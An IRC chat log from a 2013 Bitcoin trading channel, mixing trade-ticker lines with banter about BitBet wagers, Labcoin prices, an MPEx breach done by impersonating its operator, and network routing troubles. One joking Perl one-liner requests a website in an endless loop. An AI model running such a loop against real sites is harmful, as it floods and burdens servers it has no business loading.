mercedes' is 10x as important as injectors looking like mercedes' Sep 26 18:14:34 lol pankkake Sep 26 18:14:43 we need bash.bitcoin-ass.... Sep 26 18:14:52 because rearview mirror is 10x as big, not to mention how much more visible it is. Sep 26 18:15:19 I was using a quote bot elsewhere, but it crapped out Sep 26 18:15:28 so now I'm procrastining on writing a very simple one Sep 26 18:18:35 [BTCTC] [FN] [DMS.SELLING] 348 @ 0.0067 = 2.3316 BTC [-] Sep 26 18:22:40 [BTCTC] [LABCOIN] 392 @ 0.00103 = 0.4038 BTC [+] Sep 26 18:22:40 [BTCTC] [FN] [DMS.SELLING] 694 @ 0.0067778 = 4.7038 BTC [+] {3} Sep 26 18:23:12 when the New Bet form does validate, it forgets the "place your bet on" part Sep 26 18:23:41 [BTCTC] [LABCOIN] 2500 @ 0.00098134 = 2.4534 BTC [-] {4} Sep 26 18:23:55 and I didn't check again, so here's why there's a second submission Sep 26 18:24:40 o look! digitalindustry, a full [community] member has made a contribution : https://bitcointalk.org/index.php?PHPSESSID=t01g683j9jtq8hho25kf7oul65&topic=301833.msg3239746#msg3239746 Sep 26 18:24:56 it's a logo, looking about as geenric as it could, and therefore it's a start! Sep 26 18:25:05 also, he's tried and therefore nobody should criticize him. Sep 26 18:28:08 pankkake? Sep 26 18:29:01 the initial bet is optional Sep 26 18:29:10 kakobrekla: I did put 1 days before resolution, which is invalid; so I got the form again, with all my data except "PLACE YOUR BET ON" which was removed Sep 26 18:29:40 https://bitcointalk.org/index.php?topic=301833.msg3239971#msg3239971 Sep 26 18:29:43 I know, but I set it before submitting the form, and it was forgotten Sep 26 18:29:44 "Then why has it never happened for ripplepay? Why am I not paying a fee to download or upload Ubuntu ISO? Why am I not paying a fee to access this page and submit a post?" Sep 26 18:29:46 [ANN] The First Official Ripple Fork Development - NetPay (Join the development) Sep 26 18:29:51 dude, pay-to-post btctalk would be rad. Sep 26 18:30:00 ah i see pankkake ill take a look Sep 26 18:30:33 unless I forgot to put my address in and it was removed because of that. not sure Sep 26 18:32:43 its not that Sep 26 18:39:56 [BTCTC] [ASICMINER-PT] 1 @ 1.541 BTC [+] Sep 26 18:41:51 "For this task I accept just members of bitcointalk that have at least 150 post (Sorry newbies but I need expert people)" btctalk at its best Sep 26 18:43:16 lol Sep 26 18:43:17 ahahah Sep 26 18:51:07 [BTCTC] [ASICMINER-PT] 1 @ 1.522 BTC [-] Sep 26 18:51:07 [BTCTC] [BTC-TRADING-PT] 34 @ 0.037 = 1.258 BTC [+] Sep 26 18:51:54 150 post is serious rep Sep 26 18:51:59 hard to deny it Sep 26 18:52:08 [BTCTC] [ASICMINER-PT] 4 @ 1.52149999 = 6.086 BTC [-] {3} Sep 26 18:53:09 [BTCTC] [ASICMINER-PT] 6 @ 1.52016666 = 9.121 BTC [-] {2} Sep 26 18:54:04 post one message in each altcoin giveaway and you have 150 posts in an hour :) Sep 26 18:56:23 didn't theswede guy make 5k posts in am onth ? Sep 26 18:56:49 pretty much. and stupid ones Sep 26 18:57:13 [BTCTC] [BTC-TRADING-PT] 5 @ 0.037 = 0.185 BTC [+] Sep 26 18:57:35 i've got like 32 posts now Sep 26 18:58:05 are you reesesing now ? Sep 26 18:58:37 also, allow me to introduce new moustachecoin venture capital firm and projects, with facehair ceos of pro : Sep 26 18:58:38 http://petapixel.com/2013/09/21/quirky-portraits-national-beard-mustache-championships/ Sep 26 19:00:16 [BTCTC] [FN] [BTC-GROWTH] 3 @ 0.08 = 0.24 BTC [+] Sep 26 19:01:11 some are really disgusting looking to me - not bad looking, disgusting Sep 26 19:01:24 odd Sep 26 19:02:07 I have insider info and they WON'T deliver in September. Again: best case scenario beginning of October. To the guy who asked why I don't bet big to NO: because the risk/reward is too low for me, and I mean that the risk of trusting a substantial amount of coins to a third party (BITBET) opaquely operated by a scumbag (Mircea Popescu) is not worth the risk given the low odds (EG: betting 100BTC to NO pays 107.49182167 Sep 26 19:02:07 - too low). Sep 26 19:02:36 this is precious. guy with "insider info" has ideas who's a scumbag. Sep 26 19:03:19 leaving aside the lol of "mp operates bitbet" and "a webiste which displays its db is opaque" Sep 26 19:04:02 7% in a few days isn't "too low" Sep 26 19:04:42 he's holding out for 7% a week. Sep 26 19:06:28 he would have to sell his labcoin shares to gather 100btc anyway Sep 26 19:06:58 wait. you can sell those ?! Sep 26 19:07:07 i presume so Sep 26 19:07:23 270 BTC in orders, still Sep 26 19:08:10 there's one guy bidding for a satoshi per share, I hope he gets them eventually Sep 26 19:09:48 thermodynamics requires he does. Sep 26 19:10:26 [BTCTC] [BTC-TRADING-PT] 23 @ 0.037 = 0.851 BTC [+] Sep 26 19:10:43 btctctct closes trading the 7th I think? Sep 26 19:18:34 [HAVELOCK] [NEOBEE] 130 @ 0.00290005 = 0.377 BTC [-] {3} Sep 26 19:23:10 neobee is not trading at 300% ipo price yet, not an amazing company at all Sep 26 19:23:11 AMAZING COMPANY! Sep 26 19:23:25 lets dump Sep 26 19:25:42 they're not even mining! Sep 26 19:26:50 and a whole week without dividends Sep 26 19:29:45 [BTCTC] [MININGCO.ETF] 100 @ 0.01130399 = 1.1304 BTC [-] {3} Sep 26 19:33:49 [BTCTC] [ASICMINER-PT] 25 @ 1.50503997 = 37.626 BTC [-] {10} Sep 26 19:35:51 [BTCTC] [LABCOIN] 384 @ 0.00100266 = 0.385 BTC [-] {2} Sep 26 19:36:52 [BTCTC] [LABCOIN] 320 @ 0.001 = 0.32 BTC [-] Sep 26 19:40:56 [BTCTC] [BASIC-MINING] 40 @ 0.07066248 = 2.8265 BTC [-] {5} Sep 26 19:46:02 [BTCTC] [BTC-TRADING-PT] 62 @ 0.037 = 2.294 BTC [+] Sep 26 19:46:08 http://www.fixedgearswitzerland.com/?p=1993 Sep 26 19:46:14 /// Fixed Gear Switzerland » Rossin 80′s calendar /// Sep 26 19:48:02 [HAVELOCK] [AM1] 1 @ 1.66699999 BTC [+] Sep 26 19:49:03 [HAVELOCK] [AM100] 12 @ 0.01504 = 0.1805 BTC [+] {2} Sep 26 19:50:04 [HAVELOCK] [AM100] 26 @ 0.01504997 = 0.3913 BTC [+] Sep 26 19:50:06 [BTCTC] [BITVPS] 150 @ 0.00090003 = 0.135 BTC [-] {2} Sep 26 19:51:05 [BTCTC] [BITVPS] 5195 @ 0.00050894 = 2.6439 BTC [-] {3} Sep 26 19:55:10 [BTCTC] [LABCOIN] 300 @ 0.00099416 = 0.2982 BTC [-] {2} Sep 26 19:56:11 [BTCTC] [LABCOIN] 3252 @ 0.00098675 = 3.2089 BTC [-] {7} Sep 26 19:57:12 [BTCTC] [BTC-BOND] 20 @ 0.00992 = 0.1984 BTC [+] Sep 26 19:58:13 [BTCTC] [ASICMINER-PT] 1 @ 1.502 BTC [-] Sep 26 20:00:15 [BTCTC] [LABCOIN] 224 @ 0.0009857 = 0.2208 BTC [-] {2} Sep 26 20:02:17 [BTCTC] [LABCOIN] 345 @ 0.000997 = 0.344 BTC [+] {3} Sep 26 20:08:23 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Sep 26 20:08:28 https://bitcointalk.org/index.php?topic=301645.msg3240966#msg3240966 Sep 26 20:08:33 MPEx Security Breach Sep 26 20:09:24 [BTCTC] [BTC-BOND] 100 @ 0.01009809 = 1.0098 BTC [+] {3} Sep 26 20:12:55 mpex got haxxxed Sep 26 20:12:59 I WONDER WHO DID IT Sep 26 20:13:00 :) Sep 26 20:17:29 southpark did it. Sep 26 20:20:35 [HAVELOCK] [B] [XBOND] 398 @ 0.00119001 = 0.4736 BTC [-] Sep 26 20:21:06 hm mpex down? Sep 26 20:23:38 [BTCTC] [ASICMINER-PT] 5 @ 1.524 = 7.62 BTC [+] Sep 26 20:24:31 nanotube http://trilema.com/2013/mpex-security-breach/ Sep 26 20:24:39 [BTCTC] [ASICMINER-PT] 11 @ 1.525 = 16.775 BTC [+] Sep 26 20:26:41 [BTCTC] [FN] [DMS.SELLING] 19 @ 0.006 = 0.114 BTC [-] Sep 26 20:28:01 so is anyone going to pick up their knc miner this weekend ? Sep 26 20:28:43 [BTCTC] [LABCOIN] 679 @ 0.00098508 = 0.6689 BTC [-] {2} Sep 26 20:29:07 southpark ripping on people crying about nsa today was funny Sep 26 20:29:34 alec baldwin stuff was win Sep 26 20:29:44 [BTCTC] [LABCOIN] 321 @ 0.00097199 = 0.312 BTC [-] {2} Sep 26 20:30:01 mircea_popescu: yea i saw that. just that yesterday there was a placeholder page saying "we're down" and now it isn't even loading. Sep 26 20:30:12 well yes. Sep 26 20:30:16 this is intentional. Sep 26 20:31:04 also, funny how they managed to impersonate you. hope that you have apprised your cooperators that in the future they should only trust it is you if you can sign a one time challenge. :) Sep 26 20:31:25 ;;ident mircea_popescu Sep 26 20:31:25 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is not identified. Sep 26 20:31:41 see, e.g. i don't believe it is you :) Sep 26 20:32:47 [BTCTC] [ASICMINER-PT] 7 @ 1.50128571 = 10.509 BTC [-] {2} Sep 26 20:33:27 well ok, lemme log in then. Sep 26 20:33:47 ;;eauth mircea_popescu Sep 26 20:33:48 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Sep 26 20:37:45 ;;everify freenode:#bitcoin-otc:b68f8441da4759d98be420e10eb6b404531e129579864fb00d010dba Sep 26 20:37:46 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Sep 26 20:38:08 nanotube you know, security/convenience. Sep 26 20:38:27 for instance for irc banter the fact i'm logged in with nickserv is enough for most people. Sep 26 20:40:36 since when does it matter for mp what most people think ? Sep 26 20:40:50 lol Sep 26 20:41:30 one could assume that if a password for nickserv is compromised, that a gpg password is also compromised. Sep 26 20:42:07 well one can assume the world doesn't exist at all Sep 26 20:42:21 my assumption is reasonable, your is not. Sep 26 20:42:21 yeah lets start from there Sep 26 20:43:05 i happen to use different processes for keyring pw and nickserv pw. i guess this isn't necessarily true for everyone Sep 26 20:43:42 anyway, why's the "no world" assumption unreasonable ? Sep 26 20:47:01 [BTCTC] [LABCOIN] 6139 @ 0.00095909 = 5.8879 BTC [-] {10} Sep 26 20:49:03 [BTCTC] [LABCOIN] 1792 @ 0.00093056 = 1.6676 BTC [-] {5} Sep 26 20:49:26 i'd like to know if an impression of mircea_popescu's mannerisms was part of the impersonation, and if it is recorded Sep 26 20:49:30 mircea_popescu: right, if you're just talking and there are no important decisions being made, nickserv auth is sufficient. but for giving out root login to a server.... not really. Sep 26 20:49:43 pigeons: yea, i want to know how to make a convincing mircea impression too. :) Sep 26 20:49:47 nanotube you know irc was not involved in any way. Sep 26 20:49:54 mircea_popescu: yes Sep 26 20:49:57 and those records are permanently sealed. Sep 26 20:50:17 well, i assumed that much, though i didn't /know/. :) Sep 26 20:50:37 :p Sep 26 20:50:39 aw sad times. :P gl getting the stuff back in order. Sep 26 20:50:42 has anybody questioned rich little? Sep 26 20:51:10 nanotube it's really not that bad, taking advantage of the offtime to do a laundry list of n things that needed to be done but well we can't do cause offline. Sep 26 20:51:33 ccp resets eve each day, mpex ran straight for a while. Sep 26 20:51:52 makes sense, take advantage of the downtime. Sep 26 20:51:56 pigeons lol srsly. Sep 26 20:52:06 [BTCTC] [LABCOIN] 8500 @ 0.00091101 = 7.7436 BTC [-] {11} Sep 26 20:52:06 [BTCTC] [FN] [DMS.SELLING] 47 @ 0.004 = 0.188 BTC [-] Sep 26 20:56:44 can i have root now? Sep 26 20:56:49 he's authed Sep 26 20:57:11 [BTCTC] [LABCOIN] 280 @ 0.000921 = 0.2579 BTC [-] Sep 26 20:57:12 i skimmed and that's all i got from that conversation Sep 26 20:57:32 yes you can have root. here : Sep 26 20:57:33 root Sep 26 20:58:12 [BTCTC] [LABCOIN] 12339 @ 0.00091149 = 11.2469 BTC [-] {8} Sep 26 21:00:06 pigeons let's bitbet on those rota dues Sep 26 21:00:13 [BTCTC] [LABCOIN] 2000 @ 0.000905 = 1.81 BTC [-] Sep 26 21:00:29 we should hedge against mircea_popescu deciding against himself Sep 26 21:02:13 what's this? Sep 26 21:02:15 [BTCTC] [LABCOIN] 9301 @ 0.00090442 = 8.412 BTC [-] {3} Sep 26 21:02:20 treachery! Sep 26 21:02:38 let's bet that mircea_popescu won't pay the 100 BTC or so in his failed rota experiment thing Sep 26 21:02:47 i forget al the details but it's on the internet Sep 26 21:03:12 that's a decemberish bet Sep 26 21:03:18 what do you get if you win ? Sep 26 21:03:30 probably nothing Sep 26 21:03:38 or something Sep 26 21:03:42 one of the two Sep 26 21:05:19 i thought he paid Sep 26 21:05:47 maybe I missed something Sep 26 21:06:10 oh pay the judges the yearly honorarium or whatever? i thought he paid wences who won his claim Sep 26 21:06:19 [BTCTC] [LABCOIN] 8168 @ 0.00090218 = 7.369 BTC [-] {2} Sep 26 21:06:20 I'm greedy and when people say they will give me something i usually hold them to it Sep 26 21:06:30 and he paid the judges fees for that case, i see you mean the rest of it Sep 26 21:06:32 otherwise why stay on irc Sep 26 21:06:46 yes that's what irc is for Sep 26 21:07:10 serve out my irc sentence Sep 26 21:07:20 anyway use betsofbitco not bitbet, he can just cheat there ;) Sep 26 21:07:27 HAHAHA Sep 26 21:08:21 [BTCTC] [LABCOIN] 1000 @ 0.000902 = 0.902 BTC [-] Sep 26 21:10:23 [BTCTC] [LABCOIN] 259 @ 0.000902 = 0.2336 BTC [-] Sep 26 21:11:24 [HAVELOCK] [AM100] 167 @ 0.01409956 = 2.3546 BTC [-] {10} Sep 26 21:12:25 [HAVELOCK] [AM100] 47 @ 0.01339664 = 0.6296 BTC [-] {8} Sep 26 21:16:29 [BTCTC] [LABCOIN] 3600 @ 0.00090016 = 3.2406 BTC [-] {4} Sep 26 21:16:31 to keep people amused : meanwhile we found a hole in WHM 11.? for centos. I think I get to write extensively about it later. Sep 26 21:19:32 [BTCTC] [LABCOIN] 3237 @ 0.00088822 = 2.8752 BTC [-] {2} Sep 26 21:20:33 [BTCTC] [LABCOIN] 483 @ 0.00089333 = 0.4315 BTC [+] {4} Sep 26 21:20:34 [HAVELOCK] [AM100] 17 @ 0.01367647 = 0.2325 BTC [+] {2} Sep 26 21:21:35 [BTCTC] [ASICMINER-PT] 2 @ 1.5015 = 3.003 BTC [+] {2} Sep 26 21:22:58 pretty sure centos is the problem Sep 26 21:23:36 [BTCTC] [BMF] 1000 @ 0.01437 = 14.37 BTC [-] Sep 26 21:23:37 [BTCTC] [LABCOIN] 5140 @ 0.00083618 = 4.298 BTC [-] {3} Sep 26 21:23:37 [BTCTC] [ASICMINER-PT] 1 @ 1.501 BTC [-] Sep 26 21:25:33 WHM? who would use that thing :/ Sep 26 21:25:38 [BTCTC] [LABCOIN] 5592 @ 0.00082099 = 4.591 BTC [-] {3} Sep 26 21:26:23 fbsd ftw Sep 26 21:26:39 [BTCTC] [LABCOIN] 2015 @ 0.00082 = 1.6523 BTC [-] Sep 26 21:26:59 pankkake i suspect most of the internet is on whm Sep 26 21:27:00 i do a lot with freenas lately so i'll not hate on freebsd Sep 26 21:27:16 I remember the webmin days Sep 26 21:27:40 jcpham: is there another reason that you'd hate on freebsd? Sep 26 21:27:40 [BTCTC] [LABCOIN] 11799 @ 0.00080825 = 9.5365 BTC [-] {13} Sep 26 21:27:46 oh well it seems to still exist. I saw it removed from my distro because of security issues but it seems back Sep 26 21:27:55 compiling ports sucks Sep 26 21:28:02 pff gtfo Sep 26 21:28:06 everything is old and ass backwards Sep 26 21:28:21 but other than that it's fine Sep 26 21:28:26 >.> Sep 26 21:28:41 [BTCTC] [ASICMINER-PT] 2 @ 1.5005 = 3.001 BTC [-] {2} Sep 26 21:28:42 [BTCTC] [LABCOIN] 10280 @ 0.00072055 = 7.4073 BTC [-] {6} Sep 26 21:28:44 compiling ports doesnt suck, pkg_build or whatever? Sep 26 21:28:47 freebsd has bin ports too right? Sep 26 21:29:01 i thought everything had to be compiled Sep 26 21:29:06 it's been awhile for me Sep 26 21:29:11 maybe freebsd 5 Sep 26 21:29:12 though my old freebsd is stuck on ports updates because it is annoying even with a tool Sep 26 21:29:22 then everything turned debian and i never looked back Sep 26 21:29:42 [BTCTC] [LABCOIN] 1875 @ 0.000751 = 1.4081 BTC [+] Sep 26 21:29:43 I'm thinking of using Debian kFreeBSD for this machine Sep 26 21:29:58 GNU\Hurd Sep 26 21:30:13 you can just use pkg_add if you really want to use binaries. i like to compile from src cause i guess im just more ninja. Sep 26 21:30:43 [BTCTC] [LABCOIN] 11183 @ 0.00070039 = 7.8325 BTC [-] {6} Sep 26 21:31:32 hmm Sep 26 21:31:37 labcoin 0007 Sep 26 21:31:40 is that high or low? Sep 26 21:31:44 [BTCTC] [BASIC-MINING] 75 @ 0.06915892 = 5.1869 BTC [-] {5} Sep 26 21:32:00 pigeons: that would be hipsterism. my use of freebsd is for actual reasons Sep 26 21:32:03 all time low Sep 26 21:32:45 [BTCTC] [LABCOIN] 1560 @ 0.00070007 = 1.0921 BTC [-] {4} Sep 26 21:32:57 now it is. Sep 26 21:37:51 [BTCTC] [ASICMINER-PT] 1 @ 1.501 BTC [+] Sep 26 21:39:53 [HAVELOCK] [AM1] 27 @ 1.69621108 = 45.7977 BTC [+] {9} Sep 26 21:40:53 [BTCTC] [ASICMINER-PT] 1 @ 1.502 BTC [+] Sep 26 21:40:53 [HAVELOCK] [AM100] 30 @ 0.01429833 = 0.4289 BTC [+] {2} Sep 26 21:41:04 anyway, the ports system is one of the best parts of freebsd Sep 26 21:41:54 [HAVELOCK] [AM100] 25 @ 0.0143 = 0.3575 BTC [+] Sep 26 21:42:28 mod6 oh srsly ? Sep 26 21:42:55 [BTCTC] [LABCOIN] 6474 @ 0.00082418 = 5.3357 BTC [+] {6} Sep 26 21:42:55 [HAVELOCK] [AM100] 8 @ 0.0143 = 0.1144 BTC [+] Sep 26 21:43:27 ya Sep 26 21:43:38 good for you!@ Sep 26 21:43:38 bitches come and go Sep 26 21:43:49 money come and go Sep 26 21:43:54 love come and go Sep 26 21:43:56 [BTCTC] [LABCOIN] 7681 @ 0.00083206 = 6.3911 BTC [+] {7} Sep 26 21:44:48 thx! Sep 26 21:44:57 [BTCTC] [LABCOIN] 500 @ 0.00083 = 0.415 BTC [-] Sep 26 21:45:03 I like Gentoo ebuilds better :) Sep 26 21:46:18 same Sep 26 21:47:34 mod6 jcpham is a hater Sep 26 21:48:14 ;] Sep 26 21:49:54 so mpex had the bomb uploaded Sep 26 21:49:56 he's just butthurt cause his muzak sux Sep 26 21:50:03 all proxies were hacked? Sep 26 21:50:10 lab coin is at bottom heh Sep 26 21:50:16 what happened Sep 26 21:50:49 jcpham you missed the link earlier ? Sep 26 21:51:05 i think i was reading it and then trilema took a dump Sep 26 21:51:42 jcpham: gj you accidentally the site Sep 26 21:52:12 "this webpage is not avaialable" is what netscape navigator 3.0 says Sep 26 21:52:25 you should be using mosaic Sep 26 21:52:28 let's just traceroute trilema shall we Sep 26 21:52:53 i've got some serious upstream routing issues Sep 26 21:53:04 think the nsa screwed up a routing rule Sep 26 21:53:06 [BTCTC] [LABCOIN] 5500 @ 0.00078732 = 4.3303 BTC [-] {5} Sep 26 21:53:07 [HAVELOCK] [AM100] 25 @ 0.0146 = 0.365 BTC [+] Sep 26 21:53:09 jcpham http://pastebin.com/wpwxkbtW Sep 26 21:53:23 bitcointalk.com traceroutes fail an a border router Sep 26 21:53:28 few other domains now Sep 26 21:53:34 erm .org Sep 26 21:53:35 there's a storm atm. Sep 26 21:54:07 [HAVELOCK] [AM100] 35 @ 0.0146 = 0.511 BTC [+] Sep 26 21:54:22 yeah whatever is going on it's like 10+ hops deep and a few isps after mine Sep 26 21:54:23 so.... Sep 26 21:54:37 fuck the internet today Sep 26 21:54:43 heh Sep 26 21:54:52 FUCK THAT INTERNET JCPHAM Sep 26 21:54:54 GET IT GET IT Sep 26 21:54:55 boom Sep 26 21:54:57 11 207.210.114.182 (207.210.114.182) 191.194 ms 191.984 ms 203.229 ms Sep 26 21:54:57 12 * * * Sep 26 21:54:57 13 * * * Sep 26 21:55:02 11 hops no trilema Sep 26 21:55:10 i say again Sep 26 21:55:13 fuck the internet today Sep 26 21:55:25 GET IT GET IT Sep 26 21:55:31 wow it's the Goat Sep 26 21:55:42 I have a few of those Sep 26 21:55:45 ChaangNoi how are your internets Sep 26 21:55:53 is mosaic displaying the websites for you Sep 26 21:55:57 Mosaic Sep 26 21:55:58 lol Sep 26 21:56:00 I remember that Sep 26 21:56:06 i can't gopher:// anywhere Sep 26 21:56:41 NetScape was huge when it came out Sep 26 21:56:45 cause all we had was Mosaic Sep 26 21:56:58 i used to use that back in like '94. UofM had a ton of stuff to read on there. Sep 26 21:57:02 (gopher) Sep 26 21:57:09 [BTCTC] [LABCOIN] 1584 @ 0.00075763 = 1.2001 BTC [-] {4} Sep 26 21:57:52 90's LANs > 2013 internet Sep 26 21:57:57 200 ms lol Sep 26 21:58:08 it's terrible Sep 26 21:58:12 the "web" was awesome when it was just text. no having your brain mezmorized by flashy ads while trying to read, etc. Sep 26 21:58:14 or Lynx Sep 26 21:58:14 I was managing NCSA httpd back then Sep 26 21:58:14 before Apache was mainstream Sep 26 21:58:25 i dunno what's going on but some routes are horrific Sep 26 21:58:36 mod6 yes but then we had to include everyone. Sep 26 21:58:43 and everyone cnat raed. Sep 26 21:58:50 yeah the flashy ads need to go Sep 26 21:58:50 heheh Sep 26 21:59:09 the ads that play sound and video and i can't find them grind my gears Sep 26 21:59:52 omg the ones that yell at you are the worst at like 3am when ur coding and its like "YAAAAAAH!" Sep 26 21:59:57 try to ad block ads...they find another way Sep 26 22:00:16 scumbag internet wants to sell me something Sep 26 22:00:36 yeah, adp works pretty good for me usually. Sep 26 22:00:55 http://www.homestarrunner.com/sbemail.html Sep 26 22:01:36 hahah Sep 26 22:01:44 at least this site loads Sep 26 22:01:50 what a pusher Sep 26 22:01:50 (the internet) Sep 26 22:02:15 [BTCTC] [RSM] 138 @ 0.0060231 = 0.8312 BTC [+] {4} Sep 26 22:02:17 is bitcointalk really in the netherlands? Sep 26 22:02:49 11 AS5580.edge5.Atlanta2.Level3.net (4.28.26.14) 55.544 ms 53.107 ms 55.569 ms Sep 26 22:02:52 12 eth3-2.r1.chi1.us.atrato.net (78.152.34.197) 56.842 ms 59.511 ms 52.542 ms Sep 26 22:02:55 13 eth1-4.core1.nyc1.us.atrato.net (78.152.34.149) 69.539 ms 67.386 ms 68.286 ms Sep 26 22:02:58 14 eth1-5.core1.lon1.uk.atrato.net (78.152.44.134) 139.153 ms 135.351 ms 139.482 ms Sep 26 22:03:01 15 eth7-8.core1.ams2.nl.atrato.net (78.152.44.156) 151.634 ms 147.359 ms 151.583 ms Sep 26 22:03:04 16 eth9-1.r1.ams2.nl.atrato.net (78.152.44.95) 224.654 ms 148.772 ms 159.584 ms Sep 26 22:03:07 then it starts to timeout Sep 26 22:03:17 something like that here Sep 26 22:03:18 that hop from nyc to the uk sux Sep 26 22:04:06 i'm supposed to start peering with another isp soon Sep 26 22:04:16 [BTCTC] [LABCOIN] 2321 @ 0.00088459 = 2.0531 BTC [+] {4} Sep 26 22:04:32 anyway, i can reach trilema right now Sep 26 22:04:35 anyone check ? Sep 26 22:04:37 I wish BitVPS was hosted in a carrier neutral facility Sep 26 22:04:42 so we could do that Sep 26 22:04:53 phungus these exist ? Sep 26 22:04:57 oh yeah Sep 26 22:04:58 Equinix Sep 26 22:05:05 etc Sep 26 22:05:08 Error establishing a database connection Sep 26 22:05:17 [BTCTC] [LABCOIN] 442 @ 0.000886 = 0.3916 BTC [+] {3} Sep 26 22:05:21 lmao much better Sep 26 22:05:22 mkay. Sep 26 22:07:19 [BTCTC] [ASICMINER-PT] 26 @ 1.49634614 = 38.905 BTC [-] {9} Sep 26 22:07:19 [BTCTC] [LABCOIN] 150 @ 0.000883 = 0.1325 BTC [-] Sep 26 22:08:47 site loaded Sep 26 22:08:54 i click refresh 100 times Sep 26 22:10:28 ;;google mpex.co Sep 26 22:10:28 MPEx, the Bitcoin securities exchange.: ; S.DICE - MPEx: ; MPEx FAQ: Sep 26 22:12:30 lol now i find out why im peaking. jcpham was there on a datacenter pipe running around mashing f5 Sep 26 22:14:14 wait, mircea you want us just to hit f5 a bunch on the trilema site? Sep 26 22:14:52 :) Sep 26 22:15:46 keep slamming F5, will get results Sep 26 22:17:29 [BTCTC] [LABCOIN] 1554 @ 0.00083285 = 1.2942 BTC [-] {6} Sep 26 22:19:17 perl -e 'use LWP::Simple; while(1) {$res=get("http://goatse.fr"); print "$res\n";}' Sep 26 22:21:15 lol Sep 26 22:21:31 there is a conspiracy to prevent me to bet against labcoin :| Sep 26 22:21:33 :D Sep 26 22:24:35 I wonder if it would have passed without the text I added to try to make it pass Sep 26 22:25:37 [BTCTC] [LABCOIN] 38477 @ 0.00075615 = 29.0944 BTC [-] {22} Sep 26 22:25:37 [HAVELOCK] [AM100] 14 @ 0.01469642 = 0.2057 BTC [+] {2} Sep 26 22:26:38 [BTCTC] [LABCOIN] 1222 @ 0.00072501 = 0.886 BTC [-] {4} Sep 26 22:27:09 oh goatse.fr is back. I thought they got lawyered Sep 26 22:28:40 [HAVELOCK] [AM1] 1 @ 1.69 BTC [-] Sep 26 22:28:47 maybe there should be a way to refine your bet Sep 26 22:29:26 you can't change it after it's bet on tho Sep 26 22:29:41 [BTCTC] [LABCOIN] 2060 @ 0.00071068 = 1.464 BTC [-] {6} Sep 26 22:29:45 I mean before it's accepted Sep 26 22:29:55 bitbet moderators are mean with me Sep 26 22:31:21 o Sep 26 22:31:27 i think that's what they're paid for. Sep 26 22:32:44 [BTCTC] [LABCOIN] 696 @ 0.0007119 = 0.4955 BTC [+] {3} Sep 26 22:34:43 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/#c1478 Sep 26 22:34:45 omg people Sep 26 22:34:51 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 26 22:35:07 calc does not help Sep 26 22:36:31 what kind of labcoin bet would be good? Sep 26 22:36:59 lol Sep 26 22:37:10 I think the Labcoin bet is going to be a hard sell at this point. Sep 26 22:37:18 yeah, that too Sep 26 22:37:20 kakobrekla it seems to me we were being milked when we believed the theory - launched by well known chan members no less! - that calculator wouild help Sep 26 22:37:23 milked i say! Sep 26 22:37:23 Unless you're betting ON labcoin coming through Sep 26 22:37:27 it looks like some fanboys changed their stances Sep 26 22:37:50 Oh for sure. Sep 26 22:37:53 Big sells. Sep 26 22:37:57 JOhnyBigs, lol. Sep 26 22:38:21 heh yeah mp, seems so Sep 26 22:38:21 "5BTC A SHARE" to "FUCK THIS IM OUT TAKE IT TO .000001" Sep 26 22:39:06 all within two weeks (tm) Sep 26 22:39:30 lol Sep 26 22:40:54 there needs to be a bet on bitbet about the JD bankroll size. Sep 26 22:41:24 i dunno if thats passable Sep 26 22:41:30 !jd Sep 26 22:41:30 Just-Dice stat: -834 BTC profit, 35.8k BTC invested, 140.50 mio bets, 2.04 mio BTC wagered Sep 26 22:41:47 recovered 2k since yest Sep 26 22:41:54 yeah Sep 26 22:42:06 http://trilema.com/2013/the-hole-in-whm/ Sep 26 22:42:09 The hole in whm pe Trilema - Un blog de Mircea Popescu. Sep 26 22:42:43 hm, why not passable? reading "badbets" it seems ok. Sep 26 22:43:19 not like someone is going to manipulate the bankroll for 10k btc to win a bitbet Sep 26 22:43:28 why not Sep 26 22:43:35 put it in, take it back out. Sep 26 22:43:55 seems like the ROI would be tiny. Sep 26 22:44:10 mircea_popescu: any updates on when trading will resume? Sep 26 22:44:34 ideally today. in any case before monday. Sep 26 22:45:32 and as said in trilema, new mpex key etc? Sep 26 22:46:04 yes. Sep 26 22:47:37 looks like the ddos safeguards created new problems eh? Sep 26 22:47:59 [BTCTC] [LABCOIN] 500 @ 0.00072 = 0.36 BTC [-] Sep 26 22:50:01 [BTCTC] [LABCOIN] 2020 @ 0.00072 = 1.4544 BTC [-] Sep 26 22:51:02 [BTCTC] [LABCOIN] 638 @ 0.00078377 = 0.5 BTC [+] {2} Sep 26 22:52:03 [BTCTC] [LABCOIN] 3029 @ 0.00081027 = 2.4543 BTC [+] {5} Sep 26 22:52:49 i suppose you can say that yeah. Sep 26 22:53:04 [BTCTC] [LABCOIN] 3962 @ 0.00084205 = 3.3362 BTC [+] {3} Sep 26 22:53:22 honestly, social engineering is the #1 most significant threat. people are slow to realise this, but it's a fact. Sep 26 22:53:41 consider nsa's almost complete reorientation from mathematical to social cryptanalysis efforts. Sep 26 22:53:52 consider the adventures of bitpay, closer to home. Sep 26 22:54:11 we will need much better controls on it. Sep 26 22:54:30 TRUST NO ONE Sep 26 22:54:46 almost a hour since last block, just like old times when diff went to 3.4 m and back down to 2.9 Sep 26 22:55:06 [BTCTC] [LABCOIN] 190 @ 0.000844 = 0.1604 BTC [+] Sep 26 22:55:51 phungus it's not feasible. as things grow you need people. Sep 26 22:56:02 besides, what the fuck world is that in which everyone's an army of one. Sep 26 22:56:07 [BTCTC] [LABCOIN] 277 @ 0.000844 = 0.2338 BTC [+] {2} Sep 26 22:56:16 yeah Sep 26 22:56:17 I know Sep 26 22:56:22 we have to trust at some point Sep 26 22:56:26 I just like the X Files Sep 26 22:56:26 o wow, labcoin over 8! AMAZING COPROLOGY! Sep 26 22:56:27 AMAZING COMPANY! Sep 26 22:56:55 besides, people who trust no one don't tend to get enough sleep. people who don't get enough sleep fuck up. ergo... Sep 26 22:57:03 :-) Sep 26 22:57:08 [BTCTC] [LABCOIN] 290 @ 0.000844 = 0.2448 BTC [+] Sep 26 22:57:19 amazing Sep 26 22:57:19 AMAZING COMPANY! Sep 26 22:57:21 amazing Sep 